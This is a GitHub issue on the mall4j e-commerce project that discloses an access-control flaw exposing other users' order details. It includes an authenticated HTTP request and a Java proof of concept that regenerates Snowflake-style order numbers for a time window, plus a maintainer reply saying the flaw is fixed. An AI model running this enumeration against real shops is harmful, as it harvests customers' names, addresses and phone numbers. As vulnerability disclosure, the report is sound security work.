gz-yami / mall4j

⭐️⭐️⭐️ 电商商城 小程序电商商城系统 PC商城 H5商城 APP商城 Java商城 O2O商城 跨境商城
https://www.mall4j.com
GNU Affero General Public License v3.0

There is an insecure permission vulnerability that can lead to information disclosure #13

Closed swee520 closed 1 year ago

swee520 commented 2 years ago

After the user has logged in, send the following request: GET /p/order/getOrderPayInfoByOrderNumber?orderNumbers=1585796527123730432 HTTP/2 Host: b2b2c-api.mall4j.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: application/json, text/plain, */* Accept-Language: zh Accept-Encoding: gzip, deflate Authorization: iqype7HZzm8WwlUnYTIRmXVBsfZ2Udqs+7wO+RAQLOB61CG1vjV6U+sArYkZPG8Q Origin: https://pc.mall4j.com Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-site Te: trailers Connection: close The user can supply other users' orderNumbers to obtain their private information, including address, name, phone number and so on. I wrote a script that can generate orderNumbers; with it an attacker can obtain the information of orders created on any day.

Script: ` import cn.hutool.core.date.SystemClock; import cn.hutool.core.util.IdUtil; import cn.hutool.core.util.StrUtil;

import java.io.*; import java.util.Date;

/**
 * Proof-of-concept class from the report: a copy of a Snowflake-style ID generator whose
 * {@code nextId(long)} takes the millisecond timestamp as a parameter instead of reading the
 * clock, so the IDs for any past time window can be recomputed offline.
 *
 * <p>Defender's note: an ID assembled from a millisecond timestamp plus 5 + 5 + 12 fixed bits
 * (see {@code nextId}) carries almost no entropy, so an order number must never be the only
 * access check. The endpoint has to verify that the authenticated user owns the requested
 * order before returning its details; the maintainers' reply says this was fixed, but the
 * fix itself is not shown on this page.
 */
public class test implements Serializable {

    /**
     * Writes one candidate ID per millisecond of a hard-coded one-second window to a file.
     * Every iteration constructs a fresh instance, so {@code lastTimestamp} is always -1 and
     * the sequence bits of each emitted ID are 0.
     *
     * @throws IOException if the output file cannot be opened or written
     */
    public static void main(String[] args) throws IOException {
        FileWriter f = new FileWriter("/mall4j-master/1.txt");
        FileOutputStream out = null; // never used
        for (long i = 1666884749000l; i <= 1666884750000l; i++) {
            // the inner loop runs exactly once and j is never read
            for (long j = 31l; j <= 31l; j++) {
                test test1 = new test(1,1); // workerId = 1, dataCenterId = 1
                // out = new FileOutputStream(new File("/Users/zhangchenxu/安全/代码审计靶场/mall4j-master/1.txt"));

                String str = String.valueOf(test1.nextId(i));
                System.out.println(str);
                f.write(str + "\n");
            }
        }

      //  System.out.println(test1.nextId(1666885538000l));

        // not wrapped in try-with-resources: an IOException above leaks the writer
        f.close();

    }
    private static final long serialVersionUID = 1L;

    /** Default custom epoch (ms since Unix epoch); subtracted from the timestamp in nextId. */
    public static long DEFAULT_TWEPOCH = 1288834974657L;

    /** Default clock-rollback tolerance in ms (see nextId). */
    public static long DEFAULT_TIME_OFFSET = 2000L;

    private static final long WORKER_ID_BITS = 5L;

    // 31
    private static final long MAX_WORKER_ID = -1L ^ (-1L << WORKER_ID_BITS);
    private static final long DATA_CENTER_ID_BITS = 5L;

    // 31
    private static final long MAX_DATA_CENTER_ID = -1L ^ (-1L << DATA_CENTER_ID_BITS);

    private static final long SEQUENCE_BITS = 12L;

    // bit layout of an ID, low to high: sequence (12) | workerId (5) | dataCenterId (5) | timestamp
    private static final long WORKER_ID_SHIFT = SEQUENCE_BITS;

    private static final long DATA_CENTER_ID_SHIFT = SEQUENCE_BITS + WORKER_ID_BITS;

    private static final long TIMESTAMP_LEFT_SHIFT = SEQUENCE_BITS + WORKER_ID_BITS + DATA_CENTER_ID_BITS;

    private static final long SEQUENCE_MASK = ~(-1L << SEQUENCE_BITS);// 4095

    private  long twepoch;
    private  long workerId;
    private  long dataCenterId;
    // only read by genTime(), which nothing in this class calls
    private  boolean useSystemClock;

    private  long timeOffset;

    // per-instance state: counter within the current millisecond and the last timestamp used
    private long sequence = 0L;
    private long lastTimestamp = -1L;

    /** Derives worker and data-center IDs via hutool's IdUtil (not used by main). */
    public test() {
        this(IdUtil.getWorkerId(IdUtil.getDataCenterId(MAX_DATA_CENTER_ID), MAX_WORKER_ID));
    }

    public test(long workerId) {
        this(workerId, IdUtil.getDataCenterId(MAX_DATA_CENTER_ID));
    }

    /** Constructor used by main: system clock off, default epoch and time offset. */
    public test(long workerId, long dataCenterId) {
        this(workerId, dataCenterId, false);
    }

    public test(long workerId, long dataCenterId, boolean isUseSystemClock) {
        this(null, workerId, dataCenterId, isUseSystemClock);
    }

    public test(Date epochDate, long workerId, long dataCenterId, boolean isUseSystemClock) {
        this(epochDate, workerId, dataCenterId, isUseSystemClock, DEFAULT_TIME_OFFSET);
    }

    /**
     * Full constructor.
     *
     * @param epochDate custom epoch, or null to use DEFAULT_TWEPOCH
     * @param workerId 0..MAX_WORKER_ID
     * @param dataCenterId 0..MAX_DATA_CENTER_ID
     * @param isUseSystemClock stored but only consulted by the unused genTime()
     * @param timeOffset clock-rollback tolerance in ms
     * @throws IllegalArgumentException if workerId or dataCenterId is out of range
     */
    public test(Date epochDate, long workerId, long dataCenterId, boolean isUseSystemClock, long timeOffset) {
        if (null != epochDate) {
            this.twepoch = epochDate.getTime();
            System.out.println("null != epochDate");
        } else{
            // Thu, 04 Nov 2010 01:42:54 GMT
            this.twepoch = DEFAULT_TWEPOCH;
        }
        if (workerId > MAX_WORKER_ID || workerId < 0) {
            throw new IllegalArgumentException(StrUtil.format("worker Id can't be greater than {} or less than 0", MAX_WORKER_ID));
        }
        if (dataCenterId > MAX_DATA_CENTER_ID || dataCenterId < 0) {
            throw new IllegalArgumentException(StrUtil.format("datacenter Id can't be greater than {} or less than 0", MAX_DATA_CENTER_ID));
        }
        this.workerId = workerId;
        this.dataCenterId = dataCenterId;
        this.useSystemClock = isUseSystemClock;
        this.timeOffset = timeOffset;
    }

    /** Extracts the 5 worker-ID bits from a generated ID. */
    public long getWorkerId(long id) {
        return id >> WORKER_ID_SHIFT & ~(-1L << WORKER_ID_BITS);
    }

    /** Extracts the 5 data-center-ID bits from a generated ID. */
    public long getDataCenterId(long id) {
        return id >> DATA_CENTER_ID_SHIFT & ~(-1L << DATA_CENTER_ID_BITS);
    }

    /**
     * Recovers the generation time (ms since Unix epoch) from an ID: the 41 timestamp bits
     * plus this instance's epoch. Illustrates that the ID leaks its creation time.
     */
    public long getGenerateDateTime(long id) {
        return (id >> TIMESTAMP_LEFT_SHIFT & ~(-1L << 41L)) + twepoch;
    }

    /**
     * Builds the ID for the given millisecond timestamp. Unlike a normal generator the time
     * is supplied by the caller, which is what makes offline recomputation possible.
     *
     * @param time0 timestamp in ms since the Unix epoch
     * @return (time0 - twepoch) << 22 | dataCenterId << 17 | workerId << 12 | sequence
     * @throws IllegalStateException if time0 is earlier than the last timestamp by more than timeOffset
     */
    public synchronized long nextId(long time0) {

        long timestamp = time0;
        if (timestamp < this.lastTimestamp) {
            if(this.lastTimestamp - timestamp < timeOffset){
                // tolerate a clock rollback within the configured offset, to avoid errors caused by NTP adjustments
                timestamp = lastTimestamp;
            } else{
                // the server clock is wrong (moved backwards): fail instead of issuing an ID
                throw new IllegalStateException(StrUtil.format("Clock moved backwards. Refusing to generate id for {}ms", lastTimestamp - timestamp));
            }
        }

        if (timestamp == this.lastTimestamp) {
            // same millisecond as last call: bump the 12-bit counter; on wrap wait for the next ms
            final long sequence = (this.sequence + 1) & SEQUENCE_MASK;
            if (sequence == 0) {
                timestamp = tilNextMillis(lastTimestamp,time0);
            }
            this.sequence = sequence;
        } else {
            sequence = 0L;
        }

        lastTimestamp = timestamp;

        long result = ((timestamp - twepoch) << TIMESTAMP_LEFT_SHIFT)
                | (dataCenterId << DATA_CENTER_ID_SHIFT)
                | (workerId << WORKER_ID_SHIFT)
                | sequence;

        return result;
    }

    /** Stubbed out in this copy: always returns null. */
    public String nextIdStr() {
       // return Long.toString(nextId());
        return null;
    }

    // ------------------------------------------------------------------------------------------------------------------------------------ Private method start

    /**
     * Meant to spin until the clock passes lastTimestamp, but time0 is a fixed parameter here:
     * the loop body reassigns the same value, so if time0 == lastTimestamp it never terminates.
     * Presumably the generator this was copied from re-reads the clock in the loop. main never
     * reaches this path because every ID comes from a fresh instance.
     *
     * @throws IllegalStateException if time0 is earlier than lastTimestamp
     */
    private long tilNextMillis(long lastTimestamp,long time0) {
        long timestamp = time0;

        while (timestamp == lastTimestamp) {
            timestamp = time0;
        }
        if (timestamp < lastTimestamp) {
            // a timestamp smaller than the last recorded one means the OS clock went backwards: fail
            throw new IllegalStateException(
                    StrUtil.format("Clock moved backwards. Refusing to generate id for {}ms", lastTimestamp - timestamp));
        }
        return timestamp;
    }

    /** Current time in ms from hutool's SystemClock or System.currentTimeMillis(); not called anywhere in this class. */
    private long genTime() {
        return this.useSystemClock ? SystemClock.now() : System.currentTimeMillis();
    }
    // ------------------------------------------------------------------------------------------------------------------------------------ Private method end

} `

gz-yami commented 1 year ago

Thank you for your report. We have fixed this problem.